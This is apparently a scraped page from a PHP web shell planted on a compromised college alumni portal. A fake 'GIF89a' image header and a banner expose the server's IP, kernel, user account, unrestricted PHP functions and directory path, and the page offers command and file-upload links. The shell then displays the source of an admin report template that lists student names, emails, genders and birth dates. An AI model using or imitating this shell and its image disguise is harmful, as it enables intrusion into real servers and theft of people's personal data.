GIF89a;
Server IP : 172.26.0.195 / Your IP : 3.139.98.10 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../grievance/../alumni/application/views/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html lang="en"> <head> <!-- Required meta tags --> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Student/Alumni Report :: <?php echo $this->session->userdata("branchData")["branch_short_name"]; ?> | Alumni Portal</title> <link rel="stylesheet" href="<?php echo base_url("assets/admin/css/style-liberty.css"); ?>"> <link rel="stylesheet" href="<?php echo base_url("assets/admin/css/jquery-ui.css"); ?>"> <link rel="stylesheet" href="<?php echo base_url("assets/admin/css/jquery.dataTables.min.css"); ?>" type='text/css' /> <link rel="stylesheet" href="<?php echo base_url("assets/admin/css/buttons.dataTables.min.css"); ?>" type='text/css' /> <link rel="image icon" href="<?php echo base_url("/assets/images/logo.png"); ?>"> <link href="https://fonts.googleapis.com/css?family=Nunito:300,400,600,700,800,900&display=swap" rel="stylesheet"> <script src="<?php echo base_url("assets/admin/js/jquery-1.10.2.min.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/jquery-ui.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/bootstrap.min.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/jquery.dataTables.min.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/dataTables.buttons.min.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/jszip.min.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/pdfmake.min.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/vfs_fonts.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/buttons.print.min.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/buttons.html5.min.js"); ?>"></script> </head> <body class="sidebar-menu-collapsed"> <?php $this->load->view("admin/navAndHeader"); ?> <!-- main content start --> <div class="main-content"> <!-- content --> <div class="container-fluid content-top-gap"> <nav aria-label="breadcrumb"> <ol class="breadcrumb my-breadcrumb"> <li class="breadcrumb-item"><a href="<?php echo site_url("admin/Dashboard") ?>">Home</a></li> <li class="breadcrumb-item active" aria-current="page">Reports</li> <li class="breadcrumb-item active" aria-current="page"><a href="">Student/Alumni Reports</a></li> </ol> </nav> <section class="data-tables"> <div class="card card_border p-4"> <h3 class="card__title"><i class="fa fa-table"></i> Student/Alumni Reports</h3><br> <div class="table-responsive"> <?php if ($this->session->flashdata('successMessage')) { ?> <div class="alert alert-success"> <strong><?php echo $this->session->flashdata('successMessage'); ?></strong></div> <?php } ?> <?php if ($this->session->flashdata('errorMessage')) { ?> <div class="alert alert-danger"> <strong><?php echo $this->session->flashdata('errorMessage'); ?></strong> </div> <?php } ?> <fieldset> <legend>Filters <i class="fa fa-filter"></i></legend> <?php echo form_open(site_url('admin/User/index')); ?> <div class="form-row"> <div class="form-group col-md-2"> <label for="userName" class="input__label">User Name</label> <input type="text" class="form-control" id="userName" name="userName" value="<?php echo set_value('userName'); ?>" placeholder="Enter User Name" autocomplete="off" maxlength="150"> </div> <div class="form-group col-md-2"> <label class="input__label" for="course">Course</label> <select name="course" id="course" class="custom-select"> <option <?php echo set_select("course", ""); ?> value="">-Course-</option> <?php for ($i = 0; $i < sizeof($courses); $i++) { $course = $courses[$i]; ?> <option <?php echo set_select("course", $course->c_id); ?> value="<?php echo $course->c_id; ?>" ><?php echo $course->c_name; ?></option> <?php } ?> </select> </div> <div class="form-group col-md-2"> <label for="userType" class="input__label">User Type</label> <select id="userType" name="userType" class="custom-select"> <option value="" <?php echo set_select("userType", ""); ?>>All</option> <option value="Alumni" <?php echo set_select("userType", "Alumni"); ?>>Alumni</option> <option value="Student" <?php echo set_select("userType", "Student"); ?>>Student</option> </select> </div> <div class="form-group col-md-2"> <label class="input__label" for="passingYear">Passing Year</label> <select class="custom-select" name="passingYear" id="passingYear"> <option selected disabled="true">-Passing Year-</option> <?php $year = date("Y"); echo $year; for ($i = ($year + 4); $i >= 1995; $i--) { ?> <option <?php echo set_select("passingYear", $i); ?> value="<?php echo $i; ?>"><?php echo $i; ?></option> <?php } ?> </select> </div> <div class="form-group col-md-2"> <label for="startDate" class="input__label">Start Date</label> <input type="text" class="form-control" id="startDate" name="startDate" value="<?php echo set_value('startDate'); ?>" placeholder="Choose Start Date" autocomplete="off" maxlength="15"> </div> <div class="form-group col-md-2"> <label for="endDate" class="input__label">End Date</label> <input type="text" class="form-control" id="endDate" name="endDate" value="<?php echo set_value('endDate'); ?>" placeholder="Choose End Date" autocomplete="off" maxlength="15"> </div> </div> <div class="form-row"> <div class="col-md-12"> <label for="filterSubmitBtn" class="input__label"></label> <button id="filterSubmitBtn" name="filterSubmitBtn" value="filterSubmitBtn" type="submit" class="btn btn-sm btn-warning pull-right">Apply Filter & Fetch Report <i class="fa fa-filter"></i><i class="fa fa-arrow-right"></i></button> </div> </div> <hr> </fieldset> <table id="usersData" class="bootstrap-datatable table-striped table-hover" style="width:100%"> <thead> <tr> <th>Sr. No</th> <th>Name</th> <th>Email</th> <th>Gender</th> <th>DOB</th> <th>Session</th> <th>Course</th> <th>College Location</th> <th>Registration Date</th> <th>Type</th> </tr> </thead> <tfoot> <tr> <th>Sr. No</th> <th>Name</th> <th>Email</th> <th>Gender</th> <th>DOB</th> <th>Session</th> <th>Course</th> <th>College Location</th> <th>Registration Date</th> <th>Type</th> </tr> </tfoot> <tbody> <?php for ($i = 0; $i < sizeof($users); $i++) { $record = $users[$i]; ?> <tr> <td><?php echo ($i + 1); ?></td> <td><?php echo stripslashes($record->name); ?></td> <td><?php echo stripslashes($record->email); ?></td> <td><?php echo $record->gender == "M" ? "Male" : "Female"; ?></td> <td><?php echo ($record->dob==null || $record->dob=="")? "N/A" : date("d-m-Y", strtotime($record->dob)); ?></td> <td><?php echo stripslashes($record->session); ?></td> <td><?php echo stripslashes($record->c_name); ?></td> <td><?php echo stripslashes($record->college_loc); ?></td> <td><?php echo stripslashes($record->date_added); ?></td> <td><?php echo stripslashes($record->user_type); ?></td> </tr> <?php } ?> </tbody> </table> </div> </div> </section> </div> <!-- //content --> </div> </div> <!-- main content end--> <?php $this->load->view("admin/footer"); ?> <script> // $(document).ready(function () { // $("#usersData").DataTable(); // }); $(document).ready(function () { $("#usersData").DataTable({responsive: true, dom: 'Blfrtip', buttons: [ {extend: 'copy', text: "<i class='fa fa-clipboard'></i> Copy"}, {extend: 'csv', text: "<i class='fa fa-table'></i> CSV"}, {extend: 'excel', text: "<i class='fa fa-file-excel-o'></i> Excel"}, {extend: 'pdfHtml5', text: "<i class='fa fa-file-pdf-o'></i> PDF",orientation:'landscape',pageSize:'LEGAL'} ]}); }); $(function () { var dateFormat = "dd/mm/yy", from = $("#startDate") .datepicker({ dateFormat: dateFormat, defaultDate: '0', changeMonth: true, changeYear: true, numberOfMonths: 1 }).on("change", function () { to.datepicker("option", "minDate", getDate(this)); }), to = $("#endDate").datepicker({ dateFormat: dateFormat, defaultDate: '0', changeMonth: true, changeYear: true, numberOfMonths: 1 }).on("change", function () { from.datepicker("option", "maxDate", getDate(this)); }); function getDate(element) { var date; try { date = $.datepicker.parseDate(dateFormat, element.value); } catch (error) { date = null; } return date; } }); $(document).ready(function () { document.getElementById("dashboard").classList.remove("active"); document.getElementById("dataManagement").classList.remove("active"); document.getElementById("admin").classList.remove("active"); document.getElementById("notification").classList.remove("active"); document.getElementById("reports").classList.remove("active"); <?php if ($this->session->userdata("alumni_admin_data")["admin_role"] == "Master Admin") { ?> document.getElementById("adminManagement").classList.remove("active"); <?php } ?> document.getElementById("reports").classList.add("active"); }); </script>